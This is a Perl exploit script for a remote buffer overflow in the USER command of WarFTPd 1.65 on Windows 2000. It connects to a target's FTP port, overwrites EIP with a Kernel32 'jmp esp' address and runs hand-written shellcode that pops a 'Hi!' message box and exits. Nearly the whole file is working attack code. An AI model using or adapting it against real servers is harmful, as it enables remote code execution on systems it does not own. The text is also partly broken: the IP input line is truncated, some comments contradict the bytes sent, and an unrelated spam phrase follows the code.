use IO::Socket; $port=21; $|=1; #Kernel32 jmp esp 7754a3ab #Kernel32 MessageBoxA 77e375d5 #MSVCRT c_exit 78003985 print "\tRemote Buffer overflow of user in WarFTPd 1.65 for Win2k\n\n\tBy kago\@kago.ca\n\n"; print "\tEnter The Target IP :"; $ip = ; chomp $ip; $host = inet_aton($ip); $ServerAddr = sockaddr_in($port, $host); $protocol_name = "tcp"; socket(CLIENT, PF_INET, SOCK_STREAM, getprotobyname('tcp')); select(CLIENT); $|=1; select(STDOUT); if(connect(CLIENT, $ServerAddr)) { send(CLIENT,"user ",0); send(CLIENT,"\x90"x485,0); #485 nops to overwrite EIP send(CLIENT,"\xab\xa3\x54\x77",0); #Overwriting EIP with "jmp,esp" address via Kernel32.dll send(CLIENT,"\x90"x5,0); #some NOPs for padding- the "call,esp" steps to the last nop at 0098fd9c send(CLIENT,"\x55",0); #push ebp - starting something new send(CLIENT,"\x8b\xec",0); #mov ebp,esp send(CLIENT,"\x33\xff",0); #xor edi,edi - edi = 0 send(CLIENT,"\x57",0); #push edi send(CLIENT,"\xc6\x45\xfc\x48",0); #mov byte ptr [ebp-0x4],0x6f - H send(CLIENT,"\xc6\x45\xfd\x69",0); #mov byte ptr [ebp-0x3],0x78 - i send(CLIENT,"\xc6\x45\xfe\x21",0); #mov byte ptr [ebp-0x2],0x21 - ! send(CLIENT,"\xba\xd5\x75\xe3\x77",0); #mov edx, 0x77e375d5 - MessageBoxA to edx send(CLIENT,"\x52",0); #push edx send(CLIENT,"\x57",0); #push edi send(CLIENT,"\x8d\x55\xfc",0); #lea edx,[ebp-0x4] - move Hi! to edx send(CLIENT,"\x52",0); #push edx send(CLIENT,"\x52",0); #push edx send(CLIENT,"\x52",0); #push edx send(CLIENT,"\x57",0); #push edi send(CLIENT,"\xff\x55\xf8",0); #call dword ptr [ebp-0x8] send(CLIENT,"\x55",0); #push ebp - Start the exit stuff so we don't crash send(CLIENT,"\x8b\xec",0); #move ebp,esp send(CLIENT,"\xba\x86\x41\x01\x89",0); #mov edx, 0x89014186 - To exit we need to call exit at 78003985 from MSVCRT but we can't use Nulls send(CLIENT,"\x81\xea\x01\x08\x01\x11",0); #sub edx, 0x11010201 - My leet-o way to get to the address with the null send(CLIENT,"\x52",0); #push edx send(CLIENT,"\x33\xc0",0); #xor eax,eax send(CLIENT,"\x50",0); #push eax send(CLIENT,"\xff\x55\xfc",0); #call dword ptr [ebp-0x4] send(CLIENT,"\n",0); close(CLIENT); }

亚洲欧美在线